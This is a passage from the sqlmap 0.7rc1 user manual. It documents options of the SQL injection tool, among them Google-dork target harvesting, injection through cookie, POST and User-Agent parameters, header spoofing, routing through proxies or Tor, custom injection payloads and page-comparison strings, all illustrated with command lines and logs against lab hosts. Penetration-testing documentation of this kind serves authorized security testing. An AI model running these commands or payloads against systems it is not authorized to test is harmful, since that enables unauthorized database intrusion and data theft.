[hh:mm:29] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:29] [INFO] testing MySQL
[hh:mm:29] [INFO] query: CONCAT(CHAR(57), CHAR(57))
[hh:mm:29] [INFO] retrieved: 99
[hh:mm:29] [INFO] performed 20 queries in 0 seconds
[hh:mm:29] [INFO] confirming MySQL
[hh:mm:29] [INFO] query: LENGTH(CHAR(57))
[hh:mm:29] [INFO] retrieved: 1
[hh:mm:29] [INFO] performed 13 queries in 0 seconds
[hh:mm:29] [INFO] query: SELECT 9 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:29] [INFO] retrieved: 9
[hh:mm:29] [INFO] performed 13 queries in 0 seconds
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[\ldots]
```

5.2.3 Process Google dork results as target urls

Option: -g

It is also possible to test and inject on GET parameters on the results of your Google dork.

This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then sqlmap will retrieve Google first 100 results for the Google dork expression with GET parameters asking you if you want to test and inject on each possible affected URL.

Example of Google dorking with expression site:yourdomain.com ext:php:

```
$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
[hh:mm:38] [INFO] first request to Google to get the session cookie
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
testable hosts
[hh:mm:41] [INFO] sqlmap got a total of 59 targets
[hh:mm:40] [INFO] url 1:
GET http://yourdomain.com/example1.php?foo=12, do you want to test this
url? [y/N/q] n
[hh:mm:43] [INFO] url 2:
GET http://yourdomain.com/example2.php?bar=24, do you want to test this
url? [y/N/q] n
[hh:mm:42] [INFO] url 3:
GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
want to test this url? [y/N/q] y
[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
[hh:mm:45] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic
```

```
[hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic
[hh:mm:53] [INFO] GET parameter 'today' is dynamic
[hh:mm:54] [INFO] testing sql injection on GET parameter 'today'
[hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'
[hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'
[hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable
[...]
```

5.2.4 Load options from a configuration INI file

Option: -c

It is possible to pass user's options from a configuration INI file, an example is sqlmap.conf.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
```

Note that if you also provide other options from command line, those are evaluated when running sqlmap and overwrite the same options, if set, in the provided configuration file.

5.3 Request

These options can be used to specify how to connect to the target url.

5.3.1 HTTP method: GET or POST

Options: -method and -data

By default the HTTP method used to perform HTTP requests is GET, but you can change it to POST and provide the data to be sent through POST request. Such data, being those parameters, are tested for SQL injection like the GET parameters.

Example on an Oracle XE 10.2.0.1 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST \
    --data "id=1"

[hh:mm:53] [INFO] testing connection to the target url
[hh:mm:53] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:54] [INFO] url is stable
[hh:mm:54] [INFO] testing if POST parameter 'id' is dynamic
[hh:mm:54] [INFO] confirming that POST parameter 'id' is dynamic
[hh:mm:54] [INFO] POST parameter 'id' is dynamic
[hh:mm:54] [INFO] testing sql injection on POST parameter 'id'
[hh:mm:54] [INFO] testing numeric/unescaped injection on POST parameter 'id'
[hh:mm:54] [INFO] confirming numeric/unescaped injection on POST parameter 'id'
[hh:mm:54] [INFO] testing Oracle
```

```
[hh:mm:54] [INFO] query: LENGTH(SYSDATE)
[hh:mm:54] [INFO] retrieved: 9
[hh:mm:54] [INFO] performed 13 queries in 0 seconds
[hh:mm:54] [INFO] confirming Oracle
[hh:mm:54] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
[hh:mm:54] [INFO] retrieved: 10.2.0.1.0
[hh:mm:55] [INFO] performed 76 queries in 0 seconds
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
```

5.3.2 HTTP Cookie header

Option: -cookie

This feature can be useful in two scenarios:

- The web application requires authentication based upon cookies and you have such data.
- You want to test for and exploit SQL injection on such header values.

The steps to go through in the second scenario are the following:

- On Firefox web browser login on the web authentication form while dumping URL requests with TamperData browser's extension.
- In the horizontal box of the extension select your authentication transaction then in the left box on the bottom click with the right button on the Cookie value, then click on Copy to save its value to the clipboard.
- Go back to your shell and run sqlmap.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie \
    "id=1" -v 1

[hh:mm:37] [INFO] testing connection to the target url
[hh:mm:37] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:38] [INFO] url is stable
[hh:mm:38] [INFO] testing if Cookie parameter 'id' is dynamic
[hh:mm:38] [INFO] confirming that Cookie parameter 'id' is dynamic
[hh:mm:38] [INFO] Cookie parameter 'id' is dynamic
[hh:mm:38] [INFO] testing sql injection on Cookie parameter 'id'
[hh:mm:38] [INFO] testing numeric/unescaped injection on Cookie parameter 'id'
[hh:mm:38] [INFO] confirming numeric/unescaped injection on Cookie parameter 'id'
[hh:mm:38] [INFO] Cookie parameter 'id' is numeric/unescaped injectable
[...]
```

Note that the HTTP Cookie header values are separated by a ; character, ${f not}$ by an &.

If the web application at first HTTP response has within the HTTP headers a Set-Cookie header, sqlmap will automatically use it in all HTTP requests as the HTTP Cookie header and also test for SQL injection on these values.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" -v 3
[...]
[hh:mm:39] [INFO] testing connection to the target url
[hh:mm:39] [TRAFFIC OUT] HTTP request:
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.125:80
Accept-language: en-us, en; q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
Connection: close
[...]
[hh:mm:40] [INFO] url is stable
[hh:mm:40] [INFO] testing if Cookie parameter 'ASPSESSIONIDSABTRCAS' is dynamic
[hh:mm:40] [TRAFFIC OUT] HTTP request:
GET /sqlmap/get_str.asp?name=luther HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.125:80
Accept-language: en-us, en; q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
Cookie: ASPSESSIONIDSABTRCAS=469
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
[...]
```

If you provide an HTTP Cookie header value and the target URL sends an HTTP Set-Cookie header, sqlmap asks you which one to use in the following HTTP requests.

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

```
$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" --cookie "id=1" [hh:mm:51] [INPUT] you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP cookie values that you provided? [Y/n]
```

5.3.3 HTTP Referer header

Option: -referer

It is possible to fake the HTTP Referer header value with this option. By default no HTTP Referer heder is sent in HTTP requests.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer \
   "http://www.google.com" -v 3
```

```
[...]
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Referer: http://www.google.com

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)

Connection: close
[...]
```

5.3.4 HTTP User-Agent header

Options: -user-agent and -a

By default sqlmap perform HTTP requests providing the following HTTP User-Agent header value:

```
sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
```

It is possible to fake it with the -user-agent option.

Example on an Oracle XE 10.2.0.1 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
    --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

[...]
[hh:mm:02] [INF0] testing connection to the target url
[hh:mm:02] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Connection: close
[...]
```

Providing a text file, ./txt/user-agents.txt or any other file containing a list of at least one user agent, to the -a option, sqlmap will randomly select a User-Agent from the file and use it for all HTTP requests.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 \
    -a "./txt/user-agents.txt"

[hh:mm:00] [DEBUG] initializing the configuration
[hh:mm:00] [DEBUG] initializing the knowledge base
[hh:mm:00] [DEBUG] cleaning up configuration parameters
[hh:mm:00] [DEBUG] fetching random HTTP User-Agent header from file './txt/user-agents.txt'
```

```
[hh:mm:00] [INFO] fetched random HTTP User-Agent header from file './txt/user-agents.txt':
Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)
[hh:mm:00] [DEBUG] setting the HTTP method to perform HTTP requests through
[hh:mm:00] [DEBUG] creating HTTP requests opener object
[hh:mm:00] [DEBUG] parsing XML queries file
[hh:mm:00] [INFO] testing connection to the target url
[hh:mm:00] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
Accept-charset: ISO-8859-15, utf-8; q=0.7, *; q=0.7
Host: 192.168.1.121:80
Accept-language: en-us, en; q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)
Connection: close
[...]
```

Note that the HTTP User-Agent header is tested against SQL injection also if you do not overwrite the default sqlmap HTTP User-Agent header value.

Some sites perform a server-side check on the HTTP User-Agent header value and fail the HTTP response if a valid User-Agent is not provided, its value is not expected or its value is blocked by a web application firewall or similar intrusion prevention system. In this case sqlmap will show you a message as follows:

```
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or -a
```

5.3.5 Extra HTTP headers

Option: -headers

It is possible to provide extra HTTP headers by providing -headers options. Each header must be separated by a "\n" string and it's much easier to provide them from the configuration INI file. Have a look at the sample sqlmap.conf file.

5.3.6 HTTP Basic and Digest authentications

Options: -auth-type and -auth-cred

These options can be used to specify which HTTP authentication type the web server implements and the valid credentials to be used to perfor all HTTP requests to the target URL. The two valid types are Basic and Digest and the credentials' syntax is username:password.

Examples on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" \
    --auth-type Basic --auth-cred "testuser:testpass" -v 3

[...]
[hh:mm:14] [INFO] testing connection to the target url
[hh:mm:14] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/basic/get_int.php?id=1 HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
```

```
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" \
  --auth-type Digest --auth-cred "testuser:testpass" -v 3
[\ldots]
[hh:mm:54] [INFO] testing connection to the target url
[hh:mm:54] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/digest/get_int.php?id=1 HTTP/1.1
Accept-charset: ISO-8859-15, utf-8; q=0.7, *; q=0.7
Host: 192.168.1.121:80
Accept-language: en-us, en; q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
Authorization: Digest username="testuser", realm="Testing digest authentication",
nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d",
uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747",
algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a"
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
Γ...1
```

5.3.7 HTTP proxy

Option: -proxy

It is possible to provide an anonymous HTTP proxy address to pass by the HTTP requests to the target URL. The syntax of HTTP proxy value is http://url:port.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
    --proxy "http://192.168.1.47:3128"

[hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic
[hh:mm:37] [WARNING] the back-end DMBS is not MySQL
[hh:mm:37] [WARNING] the back-end DMBS is not Oracle
back-end DBMS: PostgreSQL
```

Instead of using a single anonymous HTTP proxy server to pass by, you can configure a Tor client together with Privoxy on your machine as explained on the Tor client guide then run sqlmap as follows:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
   --proxy "http://192.168.1.47:8118"
```

Note that 8118 is the default Privoxy port, adapt it to your settings.

5.3.8 Concurrent HTTP requests

Option: -threads

It is possible to specify the number of maximum concurrent HTTP requests that sqlmap can start when it uses the blind SQL injection technique to retrieve the query output. This feature relies on the multithreading concept and inherits both its pro and its cons.

Examples on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 \
  --current-user --threads 3
[...]
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[hh:mm:18] [INFO] fetching current user
[hh:mm:18] [INFO] retrieving the length of query output
[hh:mm:18] [INFO] query: IFNULL(CAST(LENGTH(CURRENT_USER()) AS CHAR(10000)), CHAR(32))
[hh:mm:18] [INFO] retrieved: 18
[hh:mm:19] [INFO] query: IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32))
[hh:mm:19] [INFO] starting 3 threads
[hh:mm:19] [INFO] retrieved: testuser@localhost
[hh:mm:19] [INFO] performed 126 queries in 0 seconds
current user:
                 'testuser@localhost'
```

As you can see, sqlmap first calculates the length of the query output, then starts three threads. Each thread is assigned to retrieve one character of the query output. The thread then ends after up to seven HTTP requests, the maximum requests to retrieve a query output character with the blind SQL injection bisection algorithm implemented in sqlmap.

Note that the multithreading option is not needed if the target is affected by an inband SQL injection vulnerability and the -union-use option has been provided.

5.3.9 Delay in seconds between each HTTP request

```
Option: -delay
```

It is possible to specify a number of seconds to wait between each HTTP request. The valid value is a float, for instance 0.5 means half a second.

5.3.10 Seconds to wait before timeout connection

```
Option: -timeout
```

It is possible to specify a number of seconds to wait before considering the HTTP request timed out. The valid value is a float, for instance 10.5 means ten seconds and a half.

5.3.11 Maximum number of retries when the HTTP connection timeouts

```
Option: -retries
```

It is possible to specify the maximum number of retries when the HTTP connection timeouts. By default it retries up to three times.

5.4 Injection

These options can be used to specify which parameters to test for, provide custom injection payloads and how to parse and compare HTTP responses page content when using the blind SQL injection technique.

5.4.1 Testable parameter(s)

Option: -p

By default sqlmap tests all GET parameters, POST parameters, HTTP Cookie header values and HTTP User-Agent header value for dynamicity and SQL injection vulnerability, but it is possible to manually specificy the parameter(s) you want sqlmap to perform tests on comma separeted in order to skip dynamicity tests and perform SQL injection test and inject directly only against the provided parameter(s).

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 \
-p "id"

[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
```

Or, if you want to provide more than one parameter, for instance:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
   -p "cat,id"
```

You can also test only the HTTP User-Agent header.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
    -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INF0] testing connection to the target url
[hh:mm:40] [INF0] testing if the url is stable, wait a few seconds
[hh:mm:41] [INF0] url is stable
[hh:mm:41] [INF0] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INF0] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INF0] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INF0] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INF0] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INF0] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
```

```
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
```

5.4.2 Force the database management system name

Option: -dbms

By default sqlmap automatically detects the web application's back-end database management system. At the moment the fully supported database management system are four:

- MySQL
- Oracle
- PostgreSQL
- Microsoft SQL Server

It is possible to force the DBMS name if you already know it so that sqlmap will skip the fingerprint with an exception for MySQL and Microsoft SQL Server to only identify the version. To avoid also this check you can provide instead MySQL VERSION or Microsoft SQL Server VERSION where version is a valid version for the DBMS, for instance 5.0 for MySQL and 2005 for Microsoft SQL Server.

Example on a PostgreSQL 8.3.5 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 \
    --dbms "PostgreSQL"

[...]
[hh:mm:31] [DEBUG] skipping to test for MySQL
[hh:mm:31] [DEBUG] skipping to test for Oracle
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
```

In case you provide -fingerprint together with -dbms, sqlmap will only perform the extensive fingerprint for the specified database management system, read below for further details.

Note that this option is **not** mandatory and it is strongly recommended to use it **only if you are absolutely sure** about the back-end database management system. If you do not know it, let sqlmap automatically identify it for you.

5.4.3 Force the database management system operating system name

Option: -os

By default sqlmap automatically detects the web application's back-end database management system underlying operating system when requested by any other functionality. At the moment the fully supported operating systems are two:

- Linux
- Windows

It is possible to force the operating system name if you already know it so that sqlmap will skip the fingerprint.

Note that this option is **not** mandatory and it is strongly recommended to use it **only if you are absolutely sure** about the back-end database management system underlying operating system. If you do not know it, let sqlmap automatically identify it for you.

5.4.4 Custom injection payload

Options: -prefix and -postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: \$query = "SELECT * FROM users WHERE id=('" . \$_GET['id'] . "') LIMIT 0, 1";:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
  -p "id" --prefix "'" --postfix "AND 'test'='test"
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with O parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
28\%27test27=\%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us, en; q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[\ldots]
```

As you can see, the injection payload for testing for custom injection is:

```
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
```

which URL decoded is:

```
id=1') AND 7433=7433 AND ('test'='test
```

and makes the query syntatically correct to the page query:

```
SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1
```

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

5.4.5 Page comparison

```
Options: -string and -regexp
```

By default the distinction of a True query by a False one (basic concept for Inferential blind SQL injection attacks) is done comparing injected requests page content MD5 hash with the original not injected page content MD5 hash. Not always this concept works because sometimes the page content changes at each refresh even not injecting anything, for instance when the page has a counter, a dynamic advertisment banner or any other part of the HTML which is render dynamically and might change in time not only consequently to user's input. To bypass this limit, sqlmap makes it possible to manually provide a string which is always present on the not injected page and on all True injected query pages, but that it is not on the False ones. This can also be achieved by providing a regular expression. Such information is easy for an user to retrieve, simply try to inject on the affected URL parameter an invalid value and compare original (not injected) page content with the injected wrong page content to identify which string or regular expression match is on not injected and True page only. This way the distinction will be based upon string presence or regular expression match and not page MD5 hash comparison.

Example on a MySQL 5.0.67 target on a page which content changes every second due to a call to PHP function time():

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
  -v 5
[...]
[hh:mm:50] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:50] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
Date: Fri, 25 Jul 2008 14:29:50 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
```

```
<html><body>
<b>SQL results:</b>
\label{td} $$ \tt>1
</body></html>Dynamic content: 1216996190
[hh:mm:51] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
Date: Fri, 25 Jul 2008 14:29:51 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 161
Connection: close
Content-Type: text/html
<html><body>
<b>SQL results:</b>
11utherblissett
</body></html>Dynamic content: 1216996191
[hh:mm:51] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
Date: Fri, 25 Jul 2008 14:29:51 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 161
Connection: close
Content-Type: text/html
<html><body>
<b>SQL results:</b>
1td>(tt)
</body></html>Dynamic content: 1216996191
[hh:mm:51] [ERROR] url is not stable, try with --string or --regexp options, refer to
the user's manual paragraph 'Page comparison' for details
```

As you can see, the string after Dynamic content changes its value every second. In the example it is just

a call to PHP time() function, but on the real world it is usually much more than that.

Looking at the HTTP responses page content you can see that the first five lines of code do not change at all. So choosing for instance the word luther as an output that is on the not injected page content and it is not on the False page content (because the query condition returns no output so luther is not displayed on the page content) and passing it to sqlmap, you are able to inject anyway.

Example on a MySQL 5.0.67 target on a page which content changes every second due to a call to PHP function time():

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
 --string "luther" -v 1
[hh:mm:22] [INFO] testing connection to the target url
[hh:mm:22] [INFO] testing if the provided string is within the target URL page content
[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
[...]
```

You can also specify a regular expression to match rather than a string if you prefer.

Example on a MySQL 5.0.67 target on a page which content changes every second due to a call to PHP function time():

```
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" \
 --regexp "lu[\w][\w]er" -v 1
[hh:mm:22] [INFO] testing connection to the target url
[hh:mm:22] [INFO] testing if the provided regular expression matches within the target
URL page content
[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
[...]
```

As you can see, when one of these options is specified, sqlmap skips the URL stability test.

Consider one of these options a must when you are dealing with a page which content that changes itself at each refresh without modifying the user's input.

5.4.6 Exclude specific page content

```
Options: -excl-str and -excl-reg
```

